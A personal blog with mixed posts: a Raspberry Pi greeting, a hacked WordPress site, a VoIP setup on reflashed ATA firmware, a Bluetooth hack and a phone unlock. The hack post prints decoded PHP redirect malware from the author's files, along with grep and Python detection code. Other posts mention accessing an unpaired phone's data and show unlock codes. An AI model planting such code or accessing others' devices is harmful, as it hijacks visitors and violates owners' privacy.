First Raspberry Pi Lab: Hello There

Hello there!  This is my first attempt at messing with Raspberry Pi.

It’s pretty simple; pretty much everything is from Adafruit, including the basic script instructions. I modified a few little things and added Obi-Wan saying “hello there”.

Check it out.

Damn you Hackers!!! Go to Hell!!!

So today, I noticed another hack that’s been installed on my machine. I have to say, ever since my move to GoDaddy.com, my site has been hacked over and over again. This is number 3. The reason why I posted about this one is because it is actually pretty interesting, and finding what was done was like a mystery. So let me tell you a quick story.

So this evening I was trying to figure out how to get my project 365 page to post automatically to my website. This is when I first noticed a slowdown and an issue when using the debugger from Facebook. At first I thought it was the WordPress plugin, but it occasionally worked. I got everything ready and posted my first auto post, and strange things started to happen.

As I stated, everything looked normal at first until I clicked on the links provided by Facebook. When I clicked on the Facebook link to my website, it went to some spam site. At first I thought it was the .htaccess hack that I received a while back, but that was not the case. Then I thought maybe it was a DNS hack. That was also not the case. Finally, I found the following in all my .php files on my web server.

It uses the eval command nested with base64_decode to run an encoded block of code.

It is quite clever. It is encoded and people may easily overlook it, but when you decode the text this is what you get:

error_reporting(0);                 // suppress PHP errors so the injection stays quiet
$qazplm=headers_sent();
if (!$qazplm){                      // only act while a redirect header can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (!stristr($uag,"MSIE 7.0")){
            // only visitors arriving from a search engine, URL shortener or social site
            if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler")
                or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport")
                or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru")
                or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com")
                or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
                or preg_match ("/google\.(.*?)\/url\?sa/",$referer)
                or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
                if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                    // send the visitor to the spam site instead of the requested page
                    header("Location: http://minkof.sellclassics.com/");
                    exit();
                }
            }
        }
    }
}

Tricky huh?

So, well… the solution? Remove all of that code from all the .php files. With a little help from “grep” I was able to locate all the bad code.

grep -H -r 'eval(base64_decode' ./
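
The grep locates the wrapper but does not show what each copy runs. The following Python is an added example, not code from the original post: it walks a directory, finds the same eval(base64_decode(...)) wrapper in .php files, decodes each payload and labels it with traits of the redirect shown above. The trait names, the `redirect.example` host and the two-file sample tree are constructed for illustration.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# eval(base64_decode('...')) with optional whitespace and either quote style.
WRAPPER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# Traits of the decoded payload shown in the post (a conditional redirect).
TRAITS = {
    "error_suppression": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
    "redirect": re.compile(r"header\s*\(\s*[\"']Location:", re.I),
    "referer_check": re.compile(r"HTTP_REFERER"),
}

def decode_payload(b64_text):
    """Decode base64 as PHP would: ignore line wraps, accept missing padding."""
    compact = "".join(b64_text.split())
    compact += "=" * (-len(compact) % 4)
    try:
        return base64.b64decode(compact).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None

def scan_tree(root):
    """Return (file name, trait names, decoded text) for every wrapper found."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(errors="replace")
        for match in WRAPPER.finditer(text):
            decoded = decode_payload(match.group(2))
            if decoded is not None:
                traits = sorted(n for n, rx in TRAITS.items() if rx.search(decoded))
                findings.append((path.name, traits, decoded))
    return findings

def demo():
    """Scan a constructed two-file tree: one clean file, one injected file."""
    payload = ('error_reporting(0); if (stristr($_SERVER["HTTP_REFERER"],"bing")) '
               '{ header("Location: http://redirect.example/"); exit(); }')
    blob = base64.b64encode(payload.encode()).decode().rstrip("=")
    with tempfile.TemporaryDirectory() as root:
        Path(root, "clean.php").write_text("<?php echo 'hello'; ?>\n")
        Path(root, "index.php").write_text(f"<?php eval(base64_decode('{blob}')); ?>\n")
        return scan_tree(root)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Reviewing the decoded text per file shows whether every hit is the same redirect or whether a different payload is hiding behind the same wrapper.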

So, Go To Hell You Punk Hackers!!! I hope you guys get busted and become someone’s bitch in prison.

Google Voice Turns 1

It’s pretty interesting… Just recently I figured out how to use Google Voice and my old Packet8 ATA to get free phone service within the US, and today I found out that Google Voice turns 1.

Happy Birthday Google Voice!!!

http://lifehacker.com/5491684/google-voice-turns-one-heres-how-to-get-the-most-from-it?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+lifehacker%2Ffull+%28Lifehacker%29

Free land line phone with google voice, sipgate, and an old packet8 ATA!!!

So I don’t know what got into me yesterday, but I guess it was because of the awful AT&T service in my area. I cannot make a continuous call on AT&T’s 3G in my area without call drops. This is not only my problem, but that of everyone I know with AT&T 3G service in the Maple Leaf area. But anyway, that is not what this post is about.

So it’s been over 2 years since I moved to Seattle, and I’ve been thinking about moving my 509 number to a local 206 number for home; however, I never felt the need to do so. As weeks and months went by, I started to realize that I almost never use my land line, a.k.a. my home phone line or my plain old telephone service (POTS). So I’ve been thinking about dropping the service. The problem is that AT&T has such poor service in my area that I cannot just depend on my iPhone; no matter how awesome it is, I still need to have a home number. But $20+ a month just to hold a number is pretty pricey. So here comes my solution…

At one time I had 2 lines with Packet8; when I cancelled the 2nd line, the analog telephone adapter (ATA) from 8×8 was not returned. I have a bit of understanding of VoIP, so I figured that since Packet8 uses SIP (Session Initiation Protocol), I could probably use the same ATA to point to some other SIP provider and get by really cheap. I also already have a Google Voice (GV) account, so if I can link my Google Voice to my home phone that will be just wonderful. The following is what I found I can do and what my plan is.

The following are my steps and comments…

1) I know that I want to use GV as my home phone number. However, I need GV to point to an actual number since GV does not provide a physical phone service yet. One option is to use Gizmo5, but since they are being integrated into GV that is currently not an option. So I registered with SIPgate for a free account. The advantage of a SIPgate account is that they provide a free 206 number and also they do not charge for incoming calls.
Check out this article.
http://www.voip-news.com/feature/how-sipgate-one-stacks-060509/

2) The second step is to convert my DTA-310 ATA from Packet8 into a usable ATA. After reading online and playing with a couple of different firmwares, this is what worked for me:
– Downgrade to Packet8’s firmware version 1235 (sip1235unl.bin)
– From there load the Leadtek firmware version AR171 (sip_bva8051s_ep1_voi86171.r0)
… it took me many tries to find this version of the firmware. Look in DSLReports for the firmware if you can’t find it in the archives.
– Once the load is successful, make sure you reload and restart the DTA-310 by using the reset button.

3) Once the new firmware is loaded it should look like this.

4) I found this site to help fill in the configuration. Use the SIP credentials in SIPgate under settings to fill in the configuration. Your SIP-ID is also the SIP number in the DTA-310 configuration. Also make sure to change the server to point to sipgate.com. After I finished this configuration, I was still unable to connect to the SIP server until I configured the STUN server settings (http://en.wikipedia.org/wiki/STUN). STUN = Simple Traversal of UDP through NAT. Configuring this server setting lets you get past the local firewall. This is also the reason why we need to install the AR171 version of the firmware. The Packet8 1235 firmware also has a SIP server configuration page; however, it does not have STUN settings. Only the Leadtek firmwares have those settings.

5) Finally, reboot the DTA-310 ATA and check to see if it is registered with SipGate. You can use Sipgate to test the connection.

6) Since I am using my GV number as my primary number, I changed the outgoing caller ID within SIPgate to my Google Voice number and forwarded all Google Voice calls to my SIPgate number.

7) Test and all done!!!

Comments: OK, I know that the title states that it is free… well, it is free for all incoming calls to SIPgate; however, outgoing calls will cost 1.9 cents per minute. But if you really think about it, for 9 bucks, it will give you around 450 minutes of talk time. Typically, those unlimited VoIP services charge 9 dollars a month, while SIPgate is a pay-as-you-go solution.

Comment 2: There are also concerns about replacing land lines with this service without 911 services. Well, that is not entirely true. SIPgate does offer E911 service for $1.90 per month. That’s not too bad for peace of mind.

Comment 3: SIPgate offers a few other things in addition to GV, such as free online fax, and they also provide additional phone numbers for a price.

Ultimately, it is a pretty cool deal… by using the GV frontend, when Google finally allows SIP connections, it will be a very seamless switchover from SIPgate to all Google. Gosh, I am such a Google fanboy… So this afternoon, I will go get me a DECT 6.0 wireless phone for my new home phone setup. Yeah!!!

Oh… and if you look in the diagram above, yes, there is an even cheaper alternative shown in my hand-drawn diagram, by using IPKALL and PBXes.org. More on that method maybe later.

References…
http://linuxstation.net/pub/voip/ — a place where all the old packet8 firmwares are located.
http://www.voip-info.org/wiki/view/Packet8+DTA310+and+Asterisk — another step by step instructions on working with DTA-310
http://www.dslreports.com/forum/ — look for additional information on DTA310
http://www.broadbandreports.com/forum/remark,13924154~start=40 — Leadtek AR171 firmware
http://sipgate.com — sipgate website
http://voxilla.com/voxilla/tools/device-configuration-wizard/leadtek-configuration-wizard — ATA configuration Wizard

UPDATE 01/2011: I’ve been having some problems with SIPgate on dialing out. I have an Apple AirPort Extreme wireless router. Unfortunately it doesn’t handle the VoIP/SIP traffic properly and it doesn’t support UPnP, so 30-45 seconds into an outgoing call, the call will drop. I have two options.

1) Replace the AirPort Extreme with a much more standard wireless router where I can configure the firewall/NAT better.

2) I’ve been using my Google Voice to dial out, which basically calls me first and then calls the other person. This is also what makes it a free land line.

UPDATE 10/2011: I’ve updated my router, so I did take option 1 from above. I’ve also started to have a humming issue; after long troubleshooting it was determined that the power supply was causing the humming and causing phone issues. Moving the power supply and replacing it fixed the problem.

UPDATE 02/2012: I’ve updated my old 8×8 ATA to a Grandstream HT-502. Why? Because I purchased an old analog rotary phone for my office and I want to use it with my phone setup, and the Grandstream ATA supports pulse dialing. I believe it is one of the few ATAs that still support pulse dialing.

UPDATE 10/2012: For anyone else that is thinking about using their Google Voice as their voice over IP service… save yourself the trouble of doing anything I’ve shown above… unless you really want to learn and hack… just purchase an OBi 100 ATA or OBi 110 ATA. It is under 40 bucks and you are up and running in minutes. Less stress, less trouble. :)

UPDATE 9/2013: Since SIPgate has shut down, I am now using an alternative. Instead of going through SIPgate and forwarding the number to Google Voice, I am using YATE (Yet Another Telephone Engine) as my own gateway to Google Voice. If you don’t want to host your own, you can use Simonics’ free service. But be warned that they require you to provide your Google username and password. Use Google’s 2-factor authentication just to be safe. I will write a post about YATE at a later time when I have time.

Hacking Bluetooth

So it is almost 3:30 AM and I made a major breakthrough in my Bluetooth project. I was able to duplicate the Bluetooth vulnerability with an unpaired SE T616 phone; I was able to download its address book and FTP into the phone. WOW, more to come tomorrow. I am going to bed now.

Unlocking Debranding Sony Ericsson T616

After hours of working on the Sony Ericsson T616 to unlock/debrand it, so I can use my T-Mobile SIM card in that AT&T phone, I finally did. I have to say, it is not worth the $20 that I saved. But I guess I am a better person for figuring out how to unlock it. Well… it is not really hard if you have all the right equipment. I… well… did not have all the right equipment. It is a very interesting underground industry of unlocking cellphones. There are so many unlocking services available, and some are remote unlockers. What they do is send you a cheap T28/DSC-11 serial cable and ask you to use their software to log in to their website, and they will decode and unlock your phone. This is a one-time deal, meaning once it is unlocked, the cable is pretty much useless, unless you pay for another unlocking. Well, my friend did that to unlock his phone and had the cable left over. To me it seemed like if they can unlock it remotely, I should be able to unlock it locally. After searching long and hard, I found that there is software available to unlock it, but it is for another type of cable using parallel ports/printer ports, or USB. The software did not work for the T28 serial cable. In trying to figure this out, I wanted to see if I could see anything from the serial port. So I used Tera Term to console into my phone. With the speed set to 115200 bps 8N1, I was able to see scrolling text, some of which actually made sense. By this time, I knew that there had got to be a way to crack this.

After a long look on google and in different forums, such as gsmhosting.com, I finally found the rosetta stone.

SEMCTOOL v2.2

Do a Google search on SEMCtool_v2.2.zip and you will find many places to download it.

This was the key… this was the key program that will decipher the text and let me unlock the T616 over a serial T28 cable. Yeah!!!

I quickly downloaded it and ran the program…
During the process… I found that you need to start the phone up after you select the jobs and push “do selected jobs”. Also make sure the baud rate is at 115200.

it started to work…

Connect to phone
Check if RSA is active
Bypass boot authority
…. then boom…
ERROR 0001A1

oh no… it crashed and it did not continue…
I was about to give up. I was looking for different programs and trying to find ways to resolve it, then I found a forum message that says…
“keep pumping the power button until you get past the boot sequence”

What?… ok … I will give it a try … then IT WORKED!!!

Connect to phone
Check if RSA is active
Bypass boot authority
Initialize boot
Load data to phone
Clear all SP locks
New SP Lock area format
Reset user code
Read all codes
New SP Lock area format
IMEI: 010193005165199
NCK: 82110220
NSCK: 70985399
CCK: 80152156
SPCK: 59993314
Operation succesfull

SWEET!!!!

I popped in my T-Mobile SIM… and it worked like a charm!!

Awesome!!!

I hope my adventure will help some poor soul that is trying to do the same.

Good luck.